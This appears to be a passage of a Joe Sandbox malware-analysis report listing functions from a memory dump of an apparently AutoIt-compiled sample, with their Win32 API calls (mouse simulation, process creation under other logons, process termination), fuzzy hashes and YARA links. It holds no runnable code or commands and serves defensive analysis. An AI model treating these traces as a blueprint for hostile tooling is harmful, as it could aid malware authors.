
API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: 2236878590fb5af1fe3c2880198cb649ddafc2afc2f2237030c3e2cf94389bd7
Instruction ID: 7024159d3628ec8e26ad1dc24f1cb17843f9946a38bff27cb7dde36ffda97b76
Opcode Fuzzy Hash: 2236878590fb5af1fe3c2880198cb649ddafc2afc2f2237030c3e2cf94389bd7
Instruction Fuzzy Hash: E75179312082049FC715EF64D885EAFBBE8FF85314F80492EF8459B2A2DB35E905CB56

Function 00425799 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 004257FB
GetMenuItemCount.USER32(00000000), ref: 00425832
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0042585A
GetMenuItemID.USER32(?,?), ref: 004258C9
GetSubMenu.USER32(?,?), ref: 004258D7
PostMessageW.USER32(?,00000111,?,00000000), ref: 00425928

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: 2d5a4b1687a813a04395b8582866dbd3f8325c8f86c477adb8fefdc0302ced43
Instruction ID: bd4f5506da923454550b32f2c3ef7da0c9a34bbd3f0fe0168fb9f51a13cefcb4
Opcode Fuzzy Hash: 2d5a4b1687a813a04395b8582866dbd3f8325c8f86c477adb8fefdc0302ced43
Instruction Fuzzy Hash: 82516F75E00625EFCF15EF64D845AAEBBB4EF49310F50406AE805BB351CB78AE42CB94

Function 003FEEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 003FEF06
VariantClear.OLEAUT32(00000013), ref: 003FEF78
VariantClear.OLEAUT32(00000000), ref: 003FEFD3
_memmove.LIBCMT ref: 003FEFFD
VariantClear.OLEAUT32(?), ref: 003FF04A
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 003FF078

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType_memmove
String ID:
API String ID: 1101466143-0
Opcode ID: e4ad59713bd9d0131e93427921538f5f1569d31b3733b1539e5ba4d7cd3fd7e6
Instruction ID: 8d7ed3a79c8a1f4c7d406387296167bfbb139b6a11e7ccbe1c43a0b52aa399c1
Opcode Fuzzy Hash: e4ad59713bd9d0131e93427921538f5f1569d31b3733b1539e5ba4d7cd3fd7e6
Instruction Fuzzy Hash: 53514CB5A00209DFDB14DF58C884EAAB7B8FF4C314B158569EE59DB301E735E911CBA0

Function 0040220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00402258
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004022A3
IsMenu.USER32(00000000), ref: 004022C3
CreatePopupMenu.USER32 ref: 004022F7
GetMenuItemCount.USER32(000000FF), ref: 00402355
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00402386

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: 581e2796310a89966d706c79a95fbded10a9c12b9453a3514485397250f64beb
Instruction ID: 8cee6fc26ac7f1e8b1015b1017c0c23c51869e283eafbbe9ad7315c55857cc34
Opcode Fuzzy Hash: 581e2796310a89966d706c79a95fbded10a9c12b9453a3514485397250f64beb
Instruction Fuzzy Hash: 4B519C30600209EBDF21CF68CA8CBAEBBF5AF45318F14417AE855B72D0D3B88945CB55

Function 003A1765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 003A2612: GetWindowLongW.USER32(?,000000EB), ref: 003A2623

BeginPaint.USER32(?,?,?,?,?,?), ref: 003A179A
GetWindowRect.USER32(?,?), ref: 003A17FE
ScreenToClient.USER32(?,?), ref: 003A181B
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 003A182C
EndPaint.USER32(?,?), ref: 003A1876

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: ba8b53b0c0e551a5dee71b845ce6f2848c98412be929483a2d4ae91880a9d61b
Instruction ID: ab5a95ceaba0af294ed8d29339501ac87116321dfe460d9aac28ba2b8e3fc542
Opcode Fuzzy Hash: ba8b53b0c0e551a5dee71b845ce6f2848c98412be929483a2d4ae91880a9d61b
Instruction Fuzzy Hash: 2541BF316046009FC722DF25DC84BBA7BFCEB46724F044639F9A48B2A1D7709806DB62

Function 0042B69E Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(004657B0,00000000,00DE58E0,?,?,004657B0,?,0042B5A8,?,?), ref: 0042B712
EnableWindow.USER32(00000000,00000000), ref: 0042B736
ShowWindow.USER32(004657B0,00000000,00DE58E0,?,?,004657B0,?,0042B5A8,?,?), ref: 0042B796
ShowWindow.USER32(00000000,00000004,?,0042B5A8,?,?), ref: 0042B7A8
EnableWindow.USER32(00000000,00000001), ref: 0042B7CC
SendMessageW.USER32(?,0000130C,?,00000000), ref: 0042B7EF

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 4c162fcb0d10832cb728d2661fe7f1c31e1b908b235f2db2d39ce17f7e13d831
Instruction ID: 2dd05e1153720060df0fe7a49ff7f4a79a521a4ea8ab19248305cd6a69688a38
Opcode Fuzzy Hash: 4c162fcb0d10832cb728d2661fe7f1c31e1b908b235f2db2d39ce17f7e13d831
Instruction Fuzzy Hash: 45419134700251AFDB22CF24D499B967BF0FF85310F9841BAE9488F7A2C735A856CB94

Function 0041709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,00414E41,?,?,00000000,00000001), ref: 004170AC

Part of subcall function 004139A0: GetWindowRect.USER32(?,?), ref: 004139B3

GetDesktopWindow.USER32 ref: 004170D6
GetWindowRect.USER32(00000000), ref: 004170DD
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0041710F

Part of subcall function 00405244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004052BC

GetCursorPos.USER32(?), ref: 0041713B
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00417199

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: 2b5a78faf39099b57ea8cb067aa4a6c9d9ebb378ab601c2c67072e47b30d8885
Instruction ID: 01a9cb60e680967f0a0b52240c4658f4e50d9d09b30443454d081f66db1c3b80
Opcode Fuzzy Hash: 2b5a78faf39099b57ea8cb067aa4a6c9d9ebb378ab601c2c67072e47b30d8885
Instruction Fuzzy Hash: CA31B472505305ABD720DF14C849F9BB7A9FF88314F40093AF585A7291C674EA49CB9A

Function 003F8879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 003F80A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 003F80C0
Part of subcall function 003F80A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 003F80CA
Part of subcall function 003F80A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 003F80D9
Part of subcall function 003F80A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 003F80E0
Part of subcall function 003F80A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 003F80F6

GetLengthSid.ADVAPI32(?,00000000,003F842F), ref: 003F88CA
GetProcessHeap.KERNEL32(00000008,00000000), ref: 003F88D6
HeapAlloc.KERNEL32(00000000), ref: 003F88DD
CopySid.ADVAPI32(00000000,00000000,?), ref: 003F88F6
GetProcessHeap.KERNEL32(00000000,00000000,003F842F), ref: 003F890A
HeapFree.KERNEL32(00000000), ref: 003F8911

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 0d701d6ea51dd05d351b09bf48dd6fda849551d6e3760ccc92224ced37dd4136
Instruction ID: d7a43bc84d5f8a18b4eedeb60c9b40351d422e254b5948ac014ab29d8a1e2e6f
Opcode Fuzzy Hash: 0d701d6ea51dd05d351b09bf48dd6fda849551d6e3760ccc92224ced37dd4136
Instruction Fuzzy Hash: D2119D31601609FBDB2A9BA4DC0ABBF7BB8EB45351F904078E945D7220CB729D15DB60

Function 003F85B1 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 003F85E2
OpenProcessToken.ADVAPI32(00000000), ref: 003F85E9
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 003F85F8
CloseHandle.KERNEL32(00000004), ref: 003F8603
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 003F8632
DestroyEnvironmentBlock.USERENV(00000000), ref: 003F8646

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: f287f5df8906301e022690560a01d815f53f45e12953d47d577133332680d621
Instruction ID: a9b02480a1da921a24e7cac1bccacc2225651eb21ea24c9f56e13ab878f5a0d6
Opcode Fuzzy Hash: f287f5df8906301e022690560a01d815f53f45e12953d47d577133332680d621
Instruction Fuzzy Hash: 0711677220020DABDF128FA4DC48FEA7BB8EB49344F444074FE04A2160C6729D65AB64

Function 003FB790 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 003FB7B5
GetDeviceCaps.GDI32(00000000,00000058), ref: 003FB7C6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 003FB7CD
ReleaseDC.USER32(00000000,00000000), ref: 003FB7D5
MulDiv.KERNEL32(000009EC,?,00000000), ref: 003FB7EC
MulDiv.KERNEL32(000009EC,?,?), ref: 003FB7FE

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 9d01d873dcb0843e7644622e9a24afd41b1aab83e28881c7827f5cbdd2c7545b
Instruction ID: 59b72371669bb9d8082221eb8bf29c67e973fc8f71a6d39773013bb5a1d67f1f
Opcode Fuzzy Hash: 9d01d873dcb0843e7644622e9a24afd41b1aab83e28881c7827f5cbdd2c7545b
Instruction Fuzzy Hash: 160184B5E00209BBEB10ABE6DD45E5EBFB8EF48311F404075FA04A7291DA319C15CF90

Function 003C0162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 003C0193
MapVirtualKeyW.USER32(00000010,00000000), ref: 003C019B
MapVirtualKeyW.USER32(000000A0,00000000), ref: 003C01A6
MapVirtualKeyW.USER32(000000A1,00000000), ref: 003C01B1
MapVirtualKeyW.USER32(00000011,00000000), ref: 003C01B9
MapVirtualKeyW.USER32(00000012,00000000), ref: 003C01C1

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 3361bcf797dd183c56c13f66587a632fd1e4c8836a93ae430b194ed8200da0c3
Instruction ID: 0b3fa58c5ba225195452ea362cd4de200b3b5bf8ebc2892d21a98d3ebfed7dc0
Opcode Fuzzy Hash: 3361bcf797dd183c56c13f66587a632fd1e4c8836a93ae430b194ed8200da0c3
Instruction Fuzzy Hash: 67016CB09027597DE3008F5A8C85B52FFB8FF19354F40411BA15C47941C7F5A868CBE5

Function 004053E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 004053F9
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0040540F
GetWindowThreadProcessId.USER32(?,?), ref: 0040541E
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0040542D
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00405437
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0040543E

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: b7ffd6cec71b8eb80fe643eeed5ac388a6cb84ca38f392c77ecf8c70cd0e96b0
Instruction ID: c5816255fcb3976a81ac4538040ae5188f274e63b37f90afeda772af40670c2a
Opcode Fuzzy Hash: b7ffd6cec71b8eb80fe643eeed5ac388a6cb84ca38f392c77ecf8c70cd0e96b0
Instruction Fuzzy Hash: 43F06231240558BBD7315B529C0DEEB7A7CEFC6B11F800179F904D105096A41A0686B9

Function 00407230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00407243
EnterCriticalSection.KERNEL32(?,?,003B0EE4,?,?), ref: 00407254
TerminateThread.KERNEL32(00000000,000001F6,?,003B0EE4,?,?), ref: 00407261
WaitForSingleObject.KERNEL32(00000000,000003E8,?,003B0EE4,?,?), ref: 0040726E

Part of subcall function 00406C35: CloseHandle.KERNEL32(00000000,?,0040727B,?,003B0EE4,?,?), ref: 00406C3F

InterlockedExchange.KERNEL32(?,000001F6), ref: 00407281
LeaveCriticalSection.KERNEL32(?,?,003B0EE4,?,?), ref: 00407288

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 7be59229c2ab876a68f38acf8ba1950a1c8b5e821b51e8558c5571f6d252f6a4
Instruction ID: d468ba1af479263bf7d604444a1d82abbe05ba8817cfb9a3e518ff7324b10980
Opcode Fuzzy Hash: 7be59229c2ab876a68f38acf8ba1950a1c8b5e821b51e8558c5571f6d252f6a4
Instruction Fuzzy Hash: 70F0E236A41612EBE7611B24EE4CDEB3739FF06302BC001B6F503A00A0CB7B1816CB68

Function 003F8992 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 003F899D
UnloadUserProfile.USERENV(?,?), ref: 003F89A9
CloseHandle.KERNEL32(?), ref: 003F89B2
CloseHandle.KERNEL32(?), ref: 003F89BA
GetProcessHeap.KERNEL32(00000000,?), ref: 003F89C3
HeapFree.KERNEL32(00000000), ref: 003F89CA

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 6a2aaf19d9d740f22fd48ad2c04b74d4d31c2263a2d142da8bd00834e6aee1bc
Instruction ID: 4c37a3ace596eee47d243c8220b37ddaf8ff354a248675664b59bf91589fe486
Opcode Fuzzy Hash: 6a2aaf19d9d740f22fd48ad2c04b74d4d31c2263a2d142da8bd00834e6aee1bc
Instruction Fuzzy Hash: E0E0C236204401FBDA115FE1ED0C92ABB79FB89362BD08230F61981070CB32A83ADB58

Function 003F7530 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 231COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00432C7C,?), ref: 003F76EA
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00432C7C,?), ref: 003F7702
CLSIDFromProgID.OLE32(?,?,00000000,0042FB80,000000FF,?,00000000,00000800,00000000,?,00432C7C,?), ref: 003F7727
_memcmp.LIBCMT ref: 003F7748

Strings

,,C, xrefs: 003F753D

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID: ,,C
API String ID: 314563124-418520338
Opcode ID: 7e7f7e098a580a5e7e769cf81a9f6582e291689533d591e8a531441eb96c7514
Instruction ID: 9f67da5e04b9e84b7d76df8ef4d7e0049e4b3887cae8ba5a90c2445d7e628639
Opcode Fuzzy Hash: 7e7f7e098a580a5e7e769cf81a9f6582e291689533d591e8a531441eb96c7514
Instruction Fuzzy Hash: 9C81E775A10109EFCB05DFA4C984EFEB7B9FF89315F204568E506AB250DB71AE06CB60

Function 004185ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00418613
CharUpperBuffW.USER32(?,?), ref: 00418722
VariantClear.OLEAUT32(?), ref: 0041889A

Part of subcall function 00407562: VariantInit.OLEAUT32(00000000), ref: 004075A2
Part of subcall function 00407562: VariantCopy.OLEAUT32(00000000,?), ref: 004075AB
Part of subcall function 00407562: VariantClear.OLEAUT32(00000000), ref: 004075B7

Strings

AUTOIT.ERROR, xrefs: 00418728
Incorrect Parameter format, xrefs: 0041864B, 0041880D

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: 7142040ee9ee8b3e7a2a242873bbf035340a19b82d21f13d98915bab08906fbe
Instruction ID: 871a36c1383bdd0226beddbc5fdcbb8a8f7b14398f144e931ac82716f2711fd6
Opcode Fuzzy Hash: 7142040ee9ee8b3e7a2a242873bbf035340a19b82d21f13d98915bab08906fbe
Instruction Fuzzy Hash: DA919B716043019FC710EF24C48499BBBF4EF89314F14892EF89A9B361DB34E946CB92

Function 00402A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON

Download Yara Rule

APIs

Part of subcall function 003BFC86: _wcscpy.LIBCMT ref: 003BFCA9

_memset.LIBCMT ref: 00402B87
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00402BB6
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00402C69
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00402C97

Strings

0, xrefs: 00402B73

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
